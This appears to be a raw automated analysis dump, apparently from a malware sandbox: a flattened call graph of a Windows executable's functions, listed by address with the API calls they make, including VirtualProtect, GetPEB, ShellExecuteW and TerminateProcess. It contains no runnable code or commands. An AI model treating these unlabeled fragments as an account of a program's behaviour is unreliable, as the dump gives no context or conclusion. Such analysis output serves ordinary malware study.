51b567 39 API calls 97616->97619 97623 52f0b1 97616->97623 97618 516246 CloseHandle 97617->97618 97620 52f047 97618->97620 97621 56f10a 97619->97621 97622 51a961 22 API calls 97620->97622 97621->97623 97624 56f112 97621->97624 97625 52f04f 97622->97625 97628 52fa5b 3 API calls 97623->97628 97626 51b567 39 API calls 97624->97626 97627 516246 CloseHandle 97625->97627 97633 52f0b8 97626->97633 97629 52f056 97627->97629 97628->97633 97630 517510 53 API calls 97629->97630 97631 52f062 97630->97631 97632 516246 CloseHandle 97631->97632 97634 52f06c 97632->97634 97635 56f127 97633->97635 97636 52f0d3 97633->97636 97637 515745 5 API calls 97634->97637 97639 52fe0b 22 API calls 97635->97639 97638 516270 22 API calls 97636->97638 97640 52f07d 97637->97640 97641 52f0db 97638->97641 97642 56f12c 97639->97642 97643 56f0a0 97640->97643 97644 52f085 97640->97644 98050 52f141 97641->98050 97646 56f140 97642->97646 98070 52f866 ReadFile SetFilePointerEx 97642->98070 98068 516216 CloseHandle ISource 97643->98068 97651 5153de 27 API calls 97644->97651 97654 56f144 __fread_nolock 97646->97654 98071 580e85 22 API calls ___scrt_fastfail 97646->98071 97649 52f0ea 97649->97654 98065 5162b5 22 API calls 97649->98065 97653 52f093 97651->97653 98064 5153c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97653->98064 97656 52f0fe 97657 52f138 97656->97657 97660 516246 CloseHandle 97656->97660 97657->97506 97658 52f09a 97658->97616 97659 56f069 97658->97659 98067 57ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 97659->98067 97661 52f12c 97660->97661 97661->97657 98066 516216 CloseHandle ISource 97661->98066 97663 56f080 97663->97616 97666 597f59 120 API calls 97665->97666 97667 5995af 97666->97667 97667->97506 98122 57dbbe lstrlenW 97668->98122 97672 51a961 22 API calls 97671->97672 97673 586f1d 97672->97673 97674 51a961 22 API calls 97673->97674 97675 586f26 97674->97675 97676 586f3a 97675->97676 97677 51b567 39 API calls 97675->97677 97678 517510 53 API calls 97676->97678 97677->97676 97685 586f57 _wcslen 97678->97685 97679 586fbc 97681 517510 53 API calls 97679->97681 97680 5870bf 97682 514ecb 94 API calls 97680->97682 97683 586fc8 97681->97683 97684 5870d0 97682->97684 97688 51a8c7 22 API calls 97683->97688 97693 586fdb 97683->97693 97686 5870e5 97684->97686 97689 514ecb 94 API calls 97684->97689 97685->97679 97685->97680 97691 5870e9 97685->97691 97687 51a961 22 API calls 97686->97687 97686->97691 97690 58711a 97687->97690 97688->97693 97689->97686 97692 51a961 22 API calls 97690->97692 97691->97506 97696 587126 97692->97696 97694 587027 97693->97694 97697 587005 97693->97697 97700 51a8c7 22 API calls 97693->97700 97695 517510 53 API calls 97694->97695 97698 587034 97695->97698 97699 51a961 22 API calls 97696->97699 97701 5133c6 22 API calls 97697->97701 97703 58703d 97698->97703 97704 587047 97698->97704 97705 58712f 97699->97705 97700->97697 97702 58700f 97701->97702 97706 517510 53 API calls 97702->97706 97707 51a8c7 22 API calls 97703->97707 98236 57e199 GetFileAttributesW 97704->98236 97709 51a961 22 API calls 97705->97709 97710 58701b 97706->97710 97707->97704 97712 587138 97709->97712 97713 516350 22 API calls 97710->97713 97711 587050 97714 587063 97711->97714 97717 514c6d 22 API calls 97711->97717 97715 517510 53 API calls 97712->97715 97713->97694 97716 517510 53 API calls 97714->97716 97724 587069 97714->97724 97718 587145 97715->97718 97719 5870a0 97716->97719 97717->97714 97720 51525f 22 API calls 97718->97720 98237 57d076 57 API calls 97719->98237 97721 587166 97720->97721 97723 514c6d 22 API calls 97721->97723 97725 587175 97723->97725 97724->97691 97726 5871a9 97725->97726 97727 514c6d 22 API calls 97725->97727 97728 51a8c7 22 API calls 97726->97728 97729 587186 97727->97729 97730 5871ba 97728->97730 97729->97726 97732 516b57 22 API calls 97729->97732 97731 516350 22 API calls 97730->97731 97733 5871c8 97731->97733 97734 58719b 97732->97734 97735 516350 22 API calls 97733->97735 97737 516b57 22 API calls 97734->97737 97736 5871d6 97735->97736 97738 516350 22 API calls 97736->97738 97737->97726 97739 5871e4 97738->97739 97740 517510 53 API calls 97739->97740 97741 5871f0 97740->97741 98127 57d7bc 97741->98127 97743 587201 97744 57d4ce 4 API calls 97743->97744 97745 58720b 97744->97745 97746 517510 53 API calls 97745->97746 97749 587239 97745->97749 97747 587229 97746->97747 98181 582947 97747->98181 97750 514f39 68 API calls 97749->97750 97750->97691 97751->97512 97752->97469 97753->97472 97754->97482 97755->97495 97756->97495 97757->97471 97758->97507 97759->97507 97760->97507 97761->97504 97762->97507 97763->97534 97764->97531 97765->97536 97766->97538 97768 516250 97767->97768 97769 51625f 97767->97769 97768->97555 97769->97768 97770 516264 CloseHandle 97769->97770 97770->97768 97772 517525 97771->97772 97788 517522 97771->97788 97773 51755b 97772->97773 97774 51752d 97772->97774 97776 51756d 97773->97776 97783 5550f6 97773->97783 97785 55500f 97773->97785 97869 5351c6 26 API calls 97774->97869 97870 52fb21 51 API calls 97776->97870 97779 51753d 97782 52fddb 22 API calls 97779->97782 97780 55510e 97780->97780 97784 517547 97782->97784 97872 535183 26 API calls 97783->97872 97786 519cb3 22 API calls 97784->97786 97787 52fe0b 22 API calls 97785->97787 97793 555088 97785->97793 97786->97788 97790 555058 97787->97790 97788->97567 97789 52fddb 22 API calls 97791 55507f 97789->97791 97790->97789 97792 519cb3 22 API calls 97791->97792 97792->97793 97871 52fb21 51 API calls 97793->97871 97795 554035 97794->97795 97796 51575c CreateFileW 97794->97796 97797 51577b 97795->97797 97798 55403b CreateFileW 97795->97798 97796->97797 97797->97578 97797->97579 97798->97797 97799 554063 97798->97799 97873 5154c6 97799->97873 97803 5153f3 97802->97803 97816 5153f0 ISource 97802->97816 97804 5154c6 3 API calls 97803->97804 97803->97816 97805 515410 97804->97805 97806 51541d 97805->97806 97807 553f4b 97805->97807 97808 52fe0b 22 API calls 97806->97808 97885 52fa5b 97807->97885 97810 515429 97808->97810 97811 515722 22 API calls 97810->97811 97812 515433 97811->97812 97879 519a40 97812->97879 97815 5154c6 3 API calls 97815->97816 97816->97584 97818 51b57f 97817->97818 97819 51b578 97817->97819 97818->97541 97819->97818 97891 5362d1 39 API calls _strftime 97819->97891 97821 51b5c2 97821->97541 97823 51a961 22 API calls 97822->97823 97824 515275 97823->97824 97825 51a961 22 API calls 97824->97825 97826 51527d 97825->97826 97827 51a961 22 API calls 97826->97827 97828 515285 97827->97828 97829 51a961 22 API calls 97828->97829 97830 51528d 97829->97830 97831 553df5 97830->97831 97832 5152c1 97830->97832 97833 51a8c7 22 API calls 97831->97833 97834 516d25 22 API calls 97832->97834 97835 553dfe 97833->97835 97836 5152cf 97834->97836 97837 51a6c3 22 API calls 97835->97837 97838 5193b2 22 API calls 97836->97838 97839 515304 97837->97839 97840 5152d9 97838->97840 97845 515325 97839->97845 97854 553e20 97839->97854 97857 515349 97839->97857 97840->97839 97841 516d25 22 API calls 97840->97841 97843 5152fa 97841->97843 97844 5193b2 22 API calls 97843->97844 97844->97839 97848 514c6d 22 API calls 97845->97848 97845->97857 97846 51535a 97847 515370 97846->97847 97852 51a8c7 22 API calls 97846->97852 97849 515384 97847->97849 97855 51a8c7 22 API calls 97847->97855 97850 515332 97848->97850 97853 51538f 97849->97853 97858 51a8c7 22 API calls 97849->97858 97856 516d25 22 API calls 97850->97856 97850->97857 97851 516b57 22 API calls 97861 553ee0 97851->97861 97852->97847 97859 51a8c7 22 API calls 97853->97859 97862 51539a 97853->97862 97854->97851 97855->97849 97856->97857 97892 516d25 97857->97892 97858->97853 97859->97862 97860 514c6d 22 API calls 97860->97861 97861->97857 97861->97860 97905 5149bd 22 API calls __fread_nolock 97861->97905 97862->97559 97864->97581 97865->97589 97866->97586 97867->97594 97868->97594 97869->97779 97870->97779 97871->97783 97872->97780 97876 5154dd 97873->97876 97874 515564 SetFilePointerEx SetFilePointerEx 97878 515530 97874->97878 97875 553f9c SetFilePointerEx 97876->97874 97876->97875 97877 553f8b 97876->97877 97876->97878 97877->97875 97878->97797 97880 519abb 97879->97880 97883 519a4e 97879->97883 97890 52e40f SetFilePointerEx 97880->97890 97881 51543f 97881->97815 97883->97881 97884 519a8c ReadFile 97883->97884 97884->97881 97884->97883 97886 5154c6 3 API calls 97885->97886 97887 52fa79 97886->97887 97888 5154c6 3 API calls 97887->97888 97889 52fa9a 97888->97889 97889->97816 97890->97883 97891->97821 97893 516d91 97892->97893 97894 516d34 97892->97894 97895 5193b2 22 API calls 97893->97895 97894->97893 97896 516d3f 97894->97896 97902 516d62 __fread_nolock 97895->97902 97897 554c9d 97896->97897 97898 516d5a 97896->97898 97899 52fddb 22 API calls 97897->97899 97906 516f34 22 API calls 97898->97906 97901 554ca7 97899->97901 97903 52fe0b 22 API calls 97901->97903 97902->97846 97904 554cda 97903->97904 97905->97861 97906->97902 97908 516270 22 API calls 97907->97908 97933 519eb5 97908->97933 97909 519fd2 97950 51a4a1 22 API calls __fread_nolock 97909->97950 97911 519fec 97911->97600 97914 55f7c4 97955 5796e2 84 API calls __wsopen_s 97914->97955 97915 55f699 97922 52fddb 22 API calls 97915->97922 97916 51a405 97916->97911 97957 5796e2 84 API calls __wsopen_s 97916->97957 97920 51a6c3 22 API calls 97920->97933 97921 55f7d2 97956 51a4a1 22 API calls __fread_nolock 97921->97956 97924 55f754 97922->97924 97926 52fe0b 22 API calls 97924->97926 97925 55f7e8 97925->97911 97927 51a12c __fread_nolock 97926->97927 97927->97914 97927->97916 97929 51a587 22 API calls 97929->97933 97930 51aec9 22 API calls 97931 51a0db CharUpperBuffW 97930->97931 97951 51a673 22 API calls 97931->97951 97933->97909 97933->97914 97933->97915 97933->97916 97933->97920 97933->97927 97933->97929 97933->97930 97934 51a4a1 22 API calls 97933->97934 97949 514573 41 API calls _wcslen 97933->97949 97952 5148c8 23 API calls 97933->97952 97953 5149bd 22 API calls __fread_nolock 97933->97953 97954 51a673 22 API calls 97933->97954 97934->97933 97936 55f545 97935->97936 97937 519c7e 97935->97937 97938 55f556 97936->97938 97939 516b57 22 API calls 97936->97939 97942 52fddb 22 API calls 97937->97942 97940 51a6c3 22 API calls 97938->97940 97939->97938 97941 55f560 97940->97941 97941->97941 97943 519c91 97942->97943 97944 519c9a 97943->97944 97945 519cac 97943->97945 97946 519cb3 22 API calls 97944->97946 97947 51a961 22 API calls 97945->97947 97948 519ca2 97946->97948 97947->97948 97948->97604 97949->97933 97950->97911 97951->97933 97952->97933 97953->97933 97954->97933 97955->97921 97956->97925 97957->97911 97959 517510 53 API calls 97958->97959 97960 597f90 97959->97960 97984 597fd5 ISource 97960->97984 97996 598cd3 97960->97996 97962 598281 97963 59844f 97962->97963 97968 59828f 97962->97968 98037 598ee4 60 API calls 97963->98037 97966 59845e 97967 59846a 97966->97967 97966->97968 97967->97984 98009 597e86 97968->98009 97969 517510 53 API calls 97986 598049 97969->97986 97974 5982c8 98024 52fc70 97974->98024 97977 5982e8 98030 58359c 82 API calls __wsopen_s 97977->98030 97978 598302 98031 5163eb 22 API calls 97978->98031 97981 5982f3 GetCurrentProcess TerminateProcess 97981->97978 97982 598311 98032 516a50 22 API calls 97982->98032 97984->97607 97985 59832a 97994 598352 97985->97994 98033 5204f0 22 API calls 97985->98033 97986->97962 97986->97969 97986->97984 98028 57417d 22 API calls __fread_nolock 97986->98028 98029 59851d 42 API calls _strftime 97986->98029 97987 5984c5 97987->97984 97991 5984d9 FreeLibrary 97987->97991 97989 598341 98034 598b7b 75 API calls 97989->98034 97991->97984 97994->97987 98035 5204f0 22 API calls 97994->98035 98036 51aceb 23 API calls ISource 97994->98036 98038 598b7b 75 API calls 97994->98038 97997 51aec9 22 API calls 97996->97997 97998 598cee CharLowerBuffW 97997->97998 98039 578e54 97998->98039 98002 51a961 22 API calls 98003 598d2a 98002->98003 98004 516d25 22 API calls 98003->98004 98005 598d3e 98004->98005 98006 5193b2 22 API calls 98005->98006 98008 598d48 _wcslen 98006->98008 98007 598e5e _wcslen 98007->97986 98008->98007 98046 59851d 42 API calls _strftime 98008->98046 98010 597eec 98009->98010 98011 597ea1 98009->98011 98015 599096 98010->98015 98012 52fe0b 22 API calls 98011->98012 98013 597ec3 98012->98013 98013->98010 98014 52fddb 22 API calls 98013->98014 98014->98013 98016 5992ab ISource 98015->98016 98023 5990ba _strcat _wcslen 98015->98023 98016->97974 98017 51b567 39 API calls 98017->98023 98018 51b38f 39 API calls 98018->98023 98019 51b6b5 39 API calls 98019->98023 98020 517510 53 API calls 98020->98023 98021 53ea0c 21 API calls ___std_exception_copy 98021->98023 98023->98016 98023->98017 98023->98018 98023->98019 98023->98020 98023->98021 98049 57efae 24 API calls _wcslen 98023->98049 98026 52fc85 98024->98026 98025 52fd1d VirtualProtect 98027 52fceb 98025->98027 98026->98025 98026->98027 98027->97977 98027->97978 98028->97986 98029->97986 98030->97981 98031->97982 98032->97985 98033->97989 98034->97994 98035->97994 98036->97994 98037->97966 98038->97994 98040 578e74 _wcslen 98039->98040 98041 578f63 98040->98041 98043 578f68 98040->98043 98045 578ea9 98040->98045 98041->98002 98041->98008 98043->98041 98048 52ce60 41 API calls 98043->98048 98045->98041 98047 52ce60 41 API calls 98045->98047 98046->98007 98047->98045 98048->98043 98049->98023 98051 52f188 98050->98051 98053 52f14c 98050->98053 98052 51a6c3 22 API calls 98051->98052 98061 57caeb 98052->98061 98053->98051 98054 52f15b 98053->98054 98056 52f170 98054->98056 98058 52f17d 98054->98058 98055 57cb1a 98055->97649 98072 52f18e 98056->98072 98079 57cbf2 26 API calls 98058->98079 98061->98055 98080 57ca89 ReadFile SetFilePointerEx 98061->98080 98081 5149bd 22 API calls __fread_nolock 98061->98081 98062 52f179 98062->97649 98064->97658 98065->97656 98066->97657 98067->97663 98068->97615 98069->97615 98070->97646 98071->97654 98082 52f1d8 98072->98082 98078 52f1c1 98078->98062 98079->98062 98080->98061 98081->98061 98083 52fe0b 22 API calls 98082->98083 98084 52f1ef 98083->98084 98085 52fddb 22 API calls 98084->98085 98086 52f1a6 98085->98086 98087 5197b6 98086->98087 98101 519a1e 98087->98101 98089 519a40 2 API calls 98092 5197c7 98089->98092 98091 5197fc 98091->98078 98093 516e14 MultiByteToWideChar 98091->98093 98092->98089 98092->98091 98108 519b01 22 API calls __fread_nolock 98092->98108 98094 516e40 98093->98094 98095 516e87 98093->98095 98096 52fe0b 22 API calls 98094->98096 98097 51a6c3 22 API calls 98095->98097 98098 516e55 MultiByteToWideChar 98096->98098 98100 516e7b 98097->98100 98109 516e90 98098->98109 98100->98078 98102 55f378 98101->98102 98103 519a2f 98101->98103 98104 52fddb 22 API calls 98102->98104 98103->98092 98105 55f382 98104->98105 98106 52fe0b 22 API calls 98105->98106 98107 55f397 98106->98107 98108->98092 98110 516ea3 98109->98110 98111 516f24 98109->98111 98110->98111 98113 516eaf 98110->98113 98112 5193b2 22 API calls 98111->98112 98114 516ec1 __fread_nolock 98112->98114 98115 516ee7 98113->98115 98116 516eb9 98113->98116 98114->98100 98117 52fddb 22 API calls 98115->98117 98121 516f34 22 API calls 98116->98121 98119 516ef1 98117->98119 98120 52fe0b 22 API calls 98119->98120 98120->98114 98121->98114 98123 57dbdc GetFileAttributesW 98122->98123 98124 57d4d5 98122->98124 98123->98124 98125 57dbe8 FindFirstFileW 98123->98125 98124->97506 98125->98124 98126 57dbf9 FindClose 98125->98126 98126->98124 98128 57d7d8 98127->98128 98129 57d7f3 98128->98129 98130 57d7dd 98128->98130 98132 51a961 22 API calls 98129->98132 98131 57d7ee 98130->98131 98133 51a8c7 22 API calls 98130->98133 98131->97743 98134 57d7fb 98132->98134 98133->98131 98135 51a961 22 API calls 98134->98135 98136 57d803 98135->98136 98137 51a961 22 API calls 98136->98137 98138 57d80e 98137->98138 98139 51a961 22 API calls 98138->98139 98140 57d816 98139->98140 98141 51a961 22 API calls 98140->98141 98142 57d81e 98141->98142 98143 51a961 22 API calls 98142->98143 98144 57d826 98143->98144 98145 51a961 22 API calls 98144->98145 98146 57d82e 98145->98146 98147 51a961 22 API calls 98146->98147 98148 57d836 98147->98148 98149 51525f 22 API calls 98148->98149 98150 57d84d 98149->98150 98151 51525f 22 API calls 98150->98151 98152 57d866 98151->98152 98153 514c6d 22 API calls 98152->98153 98154 57d872 98153->98154 98155 57d885 98154->98155 98156 5193b2 22 API calls 98154->98156 98157 514c6d 22 API calls 98155->98157 98156->98155 98158 57d88e 98157->98158 98159 57d89e 98158->98159 98160 5193b2 22 API calls 98158->98160 98161 57d8b0 98159->98161 98162 51a8c7 22 API calls 98159->98162 98160->98159 98163 516350 22 API calls 98161->98163 98162->98161 98164 57d8bb 98163->98164 98238 57d978 22 API calls 98164->98238 98166 57d8ca 98239 57d978 22 API calls 98166->98239 98168 57d8dd 98169 514c6d 22 API calls 98168->98169 98170 57d8e7 98169->98170 98171 57d8fe 98170->98171 98172 57d8ec 98170->98172 98173 514c6d 22 API calls 98171->98173 98174 5133c6 22 API calls 98172->98174 98176 57d907 98173->98176 98175 57d8f9 98174->98175 98179 516350 22 API calls 98175->98179 98177 57d925 98176->98177 98178 5133c6 22 API calls 98176->98178 98180 516350 22 API calls 98177->98180 98178->98175 98179->98177 98180->98131 98182 582954 __wsopen_s 98181->98182 98183 52fe0b 22 API calls 98182->98183 98184 582971 98183->98184 98185 515722 22 API calls 98184->98185 98186 58297b 98185->98186 98187 58274e 27 API calls 98186->98187 98188 582986 98187->98188 98189 51511f 64 API calls 98188->98189 98190 58299b 98189->98190 98191 582a6c 98190->98191 98192 5829bf 98190->98192 98193 582e66 75 API calls 98191->98193 98194 582e66 75 API calls 98192->98194 98209 582a38 98193->98209 98195 5829c4 98194->98195 98200 582a75 ISource 98195->98200 98244 53d583 26 API calls 98195->98244 98197 5150f5 40 API calls 98198 582a91 98197->98198 98199 5150f5 40 API calls 98198->98199 98202 582aa1 98199->98202 98200->97749 98201 5829ed 98245 53d583 26 API calls 98201->98245 98203 5150f5 40 API calls 98202->98203 98205 582abc 98203->98205 98206 5150f5 40 API calls 98205->98206 98207 582acc 98206->98207 98208 5150f5 40 API calls 98207->98208 98210 582ae7 98208->98210 98209->98197 98209->98200 98211 5150f5 40 API calls 98210->98211 98212 582af7 98211->98212 98213 5150f5 40 API calls 98212->98213 98214 582b07 98213->98214 98215 5150f5 40 API calls 98214->98215 98216 582b17 98215->98216 98240 583017 GetTempPathW GetTempFileNameW 98216->98240 98218 582b22 98219 53e5eb 29 API calls 98218->98219 98220 582b33 98219->98220 98220->98200 98223 5150f5 40 API calls 98220->98223 98230 53dbb3 65 API calls 98220->98230 98231 582bed 98220->98231 98221 53e678 67 API calls 98222 582bf8 98221->98222 98224 582bfe DeleteFileW 98222->98224 98225 582c12 98222->98225 98223->98220 98224->98200 98226 582c91 CopyFileW 98225->98226 98232 582c18 98225->98232 98230->98220 98231->98221 98236->97711 98237->97724 98238->98166 98239->98168 98240->98218 98244->98201 98245->98209 98246 1602e30 98260 1600a80 98246->98260 98248 1602ed6 98264 1602d20 98248->98264 98261 1600a87 98260->98261 98267 1603f00 GetPEB 98261->98267 98263 160110b 98263->98248 98265 1602d29 Sleep 98264->98265 98266 1602d37 98265->98266 98268 1603f2a 98267->98268 98268->98263 98269 552ba5 98270 512b25 98269->98270 98271 552baf 98269->98271 98297 512b83 7 API calls 98270->98297 98273 513a5a 24 API calls 98271->98273 98275 552bb8 98273->98275 98277 519cb3 22 API calls 98275->98277 98279 552bc6 98277->98279 98278 512b2f 98282 513837 49 API calls 98278->98282 98288 512b44 98278->98288 98280 552bf5 98279->98280 98281 552bce 98279->98281 98284 5133c6 22 API calls 98280->98284 98283 5133c6 22 API calls 98281->98283 98282->98288 98286 552bd9 98283->98286 98285 552bf1 GetForegroundWindow ShellExecuteW 98284->98285 98291 552c26 98285->98291 98290 516350 22 API calls 98286->98290 98289 512b5f 98288->98289 98301 5130f2 Shell_NotifyIconW ___scrt_fastfail 98288->98301 98294 512b66 SetCurrentDirectoryW 98289->98294 98293 552be7 98290->98293 98291->98289 98295 5133c6 22 API calls 98293->98295 98296 512b7a 98294->98296 98295->98285 98302 512cd4 7 API calls 98297->98302 98299 512b2a 98300 512c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98299->98300 98300->98278 98301->98289 98302->98299 98303 512de3 98304 512df0 __wsopen_s 98303->98304 98305 512e09 98304->98305 98306 552c2b ___scrt_fastfail 98304->98306 98307 513aa2 23 API calls 98305->98307 98308 552c47 GetOpenFileNameW 98306->98308 98309 512e12 98307->98309 98310 552c96 98308->98310 98319 512da5 98309->98319 98312 516b57 22 API calls 98310->98312 98314 552cab 98312->98314 98314->98314 98316 512e27 98337 5144a8 98316->98337 98320 551f50 __wsopen_s 98319->98320 98321 512db2 GetLongPathNameW 98320->98321 98322 516b57 22 API calls 98321->98322 98323 512dda 98322->98323 98324 513598 98323->98324 98325 51a961 22 API calls 98324->98325 98326 5135aa 98325->98326 98327 513aa2 23 API calls 98326->98327 98328 5135b5 98327->98328 98329 5135c0 98328->98329 98330 5532eb 98328->98330 98332 51515f 22 API calls 98329->98332 98334 55330d 98330->98334 98372 52ce60 41 API calls 98330->98372 98333 5135cc 98332->98333 98366 5135f3 98333->98366 98336 5135df 98336->98316 98338 514ecb 94 API calls 98337->98338 98339 5144cd 98338->98339 98340 553833 98339->98340 98342 514ecb 94 API calls 98339->98342 98341 582cf9 80 API calls 98340->98341 98343 553848 98341->98343 98344 5144e1 98342->98344 98345 55384c 98343->98345 98346 553869 98343->98346 98344->98340 98347 5144e9 98344->98347 98348 514f39 68 API calls 98345->98348 98349 52fe0b 22 API calls 98346->98349 98350 553854 98347->98350 98351 5144f5 98347->98351 98348->98350 98365 5538ae 98349->98365 98374 57da5a 82 API calls 98350->98374 98373 51940c 136 API calls 2 library calls 98351->98373 98354 512e31 98355 553862 98355->98346 98356 553a5f 98357 514f39 68 API calls 98356->98357 98380 57989b 82 API calls __wsopen_s 98356->98380 98357->98356 98362 519cb3 22 API calls 98362->98365 98365->98356 98365->98362 98375 57967e 22 API calls __fread_nolock 98365->98375 98376 5795ad 42 API calls _wcslen 98365->98376 98377 580b5a 22 API calls 98365->98377 98378 51a4a1 22 API calls __fread_nolock 98365->98378 98379 513ff7 22 API calls 98365->98379 98367 513605 98366->98367 98371 513624 __fread_nolock 98366->98371 98369 52fe0b 22 API calls 98367->98369 98368 52fddb 22 API calls 98370 51363b 98368->98370 98369->98371 98370->98336 98371->98368 98372->98330 98373->98354 98374->98355 98375->98365 98376->98365 98377->98365 98378->98365 98379->98365 98380->98356 98381 511044 98386 5110f3 98381->98386 98383 51104a 98422 5300a3 29 API calls __onexit 98383->98422 98385 511054 98423 511398 98386->98423 98390 51116a 98391 51a961 22 API calls 98390->98391 98392 511174 98391->98392 98393 51a961 22 API calls 98392->98393 98394 51117e 98393->98394 98395 51a961 22 API calls 98394->98395 98396 511188 98395->98396 98397 51a961 22 API calls 98396->98397 98398 5111c6 98397->98398 98399 51a961 22 API calls 98398->98399 98400 511292 98399->98400 98433 51171c 98400->98433 98404 5112c4 98405 51a961 22 API calls 98404->98405 98406 5112ce 98405->98406 98407 521940 9 API calls 98406->98407 98408 5112f9 98407->98408 98454 511aab 98408->98454 98410 511315 98411 511325 GetStdHandle 98410->98411 98412 552485 98411->98412 98413 51137a 98411->98413 98412->98413 98414 55248e 98412->98414 98417 511387 OleInitialize 98413->98417 98415 52fddb 22 API calls 98414->98415 98416 552495 98415->98416 98461 58011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 98416->98461 98417->98383 98419 55249e 98462 580944 CreateThread 98419->98462 98421 5524aa CloseHandle 98421->98413 98422->98385 98463 5113f1 98423->98463 98426 5113f1 22 API calls 98427 5113d0 98426->98427 98428 51a961 22 API calls 98427->98428 98429 5113dc 98428->98429 98430 516b57 22 API calls 98429->98430 98431 511129 98430->98431 98432 511bc3 6 API calls 98431->98432 98432->98390 98434 51a961 22 API calls 98433->98434 98435 51172c 98434->98435 98436 51a961 22 API calls 98435->98436 98437 511734 98436->98437 98438 51a961 22 API calls 98437->98438 98439 51174f 98438->98439 98440 52fddb 22 API calls 98439->98440 98441 51129c 98440->98441 98442 511b4a 98441->98442 98443 511b58 98442->98443 98444 51a961 22 API calls 98443->98444 98445 511b63 98444->98445 98446 51a961 22 API calls 98445->98446 98447 511b6e 98446->98447 98448 51a961 22 API calls 98447->98448 98449 511b79 98448->98449 98450 51a961 22 API calls 98449->98450 98451 511b84 98450->98451 98452 52fddb 22 API calls 98451->98452 98453 511b96 RegisterWindowMessageW 98452->98453 98453->98404 98455 55272d 98454->98455 98456 511abb 98454->98456 98470 583209 23 API calls 98455->98470 98458 52fddb 22 API calls 98456->98458 98460 511ac3 98458->98460 98459 552738 98460->98410 98461->98419 98462->98421 98471 58092a 28 API calls 98462->98471 98464 51a961 22 API calls 98463->98464 98465 5113fc 98464->98465 98466 51a961 22 API calls 98465->98466 98467 511404 98466->98467 98468 51a961 22 API calls 98467->98468 98469 5113c6 98468->98469 98469->98426 98470->98459 98472 548402 98477 5481be 98472->98477 98475 54842a 98482 5481ef try_get_first_available_module 98477->98482 98479 5483ee 98496 5427ec 26 API calls _strftime 98479->98496 98481 548343 98481->98475 98489 550984 98481->98489 98482->98482 98485 548338 98482->98485 98492 538e0b 40 API calls 2 library calls 98482->98492 98484 54838c 98484->98485 98493 538e0b 40 API calls 2 library calls 98484->98493 98485->98481 98495 53f2d9 20 API calls __dosmaperr 98485->98495 98487 5483ab 98487->98485 98494 538e0b 40 API calls 2 library calls 98487->98494 98497 550081 98489->98497 98491 55099f 98491->98475 98492->98484 98493->98487 98494->98485 98495->98479 98496->98481 98498 55008d ___BuildCatchObject 98497->98498 98499 55009b 98498->98499 98502 5500d4 98498->98502 98555 53f2d9 20 API calls __dosmaperr 98499->98555 98501 5500a0 98556 5427ec 26 API calls _strftime 98501->98556 98508 55065b 98502->98508 98507 5500aa __fread_nolock 98507->98491 98558 55042f 98508->98558 98511 5506a6 98576 545221 98511->98576 98512 55068d 98590 53f2c6 20 API calls __dosmaperr 98512->98590 98515 550692 98591 53f2d9 20 API calls __dosmaperr 98515->98591 98516 5506ab 98517 5506b4 98516->98517 98518 5506cb 98516->98518 98592 53f2c6 20 API calls __dosmaperr 98517->98592 98589 55039a CreateFileW 98518->98589 98522 5500f8 98557 550121 LeaveCriticalSection __wsopen_s 98522->98557 98523 5506b9 98593 53f2d9 20 API calls __dosmaperr 98523->98593 98524 550781 GetFileType 98527 5507d3 98524->98527 98528 55078c GetLastError 98524->98528 98526 550756 GetLastError 98595 53f2a3 20 API calls 2 library calls 98526->98595 98598 54516a 21 API calls 3 library calls 98527->98598 98596 53f2a3 20 API calls 2 library calls 98528->98596 98529 550704 98529->98524 98529->98526 98594 55039a CreateFileW 98529->98594 98533 55079a CloseHandle 98533->98515 98536 5507c3 98533->98536 98535 550749 98535->98524 98535->98526 98597 53f2d9 20 API calls __dosmaperr 98536->98597 98537 5507f4 98540 550840 98537->98540 98599 5505ab 72 API calls 4 library calls 98537->98599 98539 5507c8 98539->98515 98544 55086d 98540->98544 98600 55014d 72 API calls 4 library calls 98540->98600 98543 550866 98543->98544 98545 55087e 98543->98545 98546 5486ae __wsopen_s 29 API calls 98544->98546 98545->98522 98547 5508fc CloseHandle 98545->98547 98546->98522 98601 55039a CreateFileW 98547->98601 98549 550927 98550 550931 GetLastError 98549->98550 98554 55095d 98549->98554 98602 53f2a3 20 API calls 2 library calls 98550->98602 98552 55093d 98603 545333 21 API calls 3 library calls 98552->98603 98554->98522 98555->98501 98556->98507 98557->98507 98559 55046a 98558->98559 98560 550450 98558->98560 98604 5503bf 98559->98604 98560->98559 98611 53f2d9 20 API calls __dosmaperr 98560->98611 98563 55045f 98612 5427ec 26 API calls _strftime 98563->98612 98565 5504a2 98566 5504d1 98565->98566 98613 53f2d9 20 API calls __dosmaperr 98565->98613 98574 550524 98566->98574 98615 53d70d 26 API calls 2 library calls 98566->98615 98569 55051f 98571 55059e 98569->98571 98569->98574 98570 5504c6 98614 5427ec 26 API calls _strftime 98570->98614 98616 5427fc 11 API calls _abort 98571->98616 98574->98511 98574->98512 98575 5505aa 98577 54522d ___BuildCatchObject 98576->98577 98619 542f5e EnterCriticalSection 98577->98619 98579 54527b 98620 54532a 98579->98620 98581 545234 98581->98579 98582 545259 98581->98582 98586 5452c7 EnterCriticalSection 98581->98586 98584 545000 __wsopen_s 21 API calls 98582->98584 98583 5452a4 __fread_nolock 98583->98516 98585 54525e 98584->98585 98585->98579 98623 545147 EnterCriticalSection 98585->98623 98586->98579 98587 5452d4 LeaveCriticalSection 98586->98587 98587->98581 98589->98529 98590->98515 98591->98522 98592->98523 98593->98515 98594->98535 98595->98515 98596->98533 98597->98539 98598->98537 98599->98540 98600->98543 98601->98549 98602->98552 98603->98554 98605 5503d7 98604->98605 98607 5503f2 98605->98607 98617 53f2d9 20 API calls __dosmaperr 98605->98617 98607->98565 98608 550416 98618 5427ec 26 API calls _strftime 98608->98618 98610 550421 98610->98565 98611->98563 98612->98559 98613->98570 98614->98566 98615->98569 98616->98575 98617->98608 98618->98610 98619->98581 98624 542fa6 LeaveCriticalSection 98620->98624 98622 545331 98622->98583 98623->98579 98624->98622 98625 562a00 98631 51d7b0 ISource 98625->98631 98626 51d9d5 98627 51db11 PeekMessageW 98627->98631 98628 51d807 GetInputState 98628->98627 98628->98631 98629 561cbe TranslateAcceleratorW 98629->98631 98631->98626 98631->98627 98631->98628 98631->98629 98632 51db73 TranslateMessage DispatchMessageW 98631->98632 98633 51db8f PeekMessageW 98631->98633 98634 51da04 timeGetTime 98631->98634 98635 51dbaf Sleep 98631->98635 98636 562b74 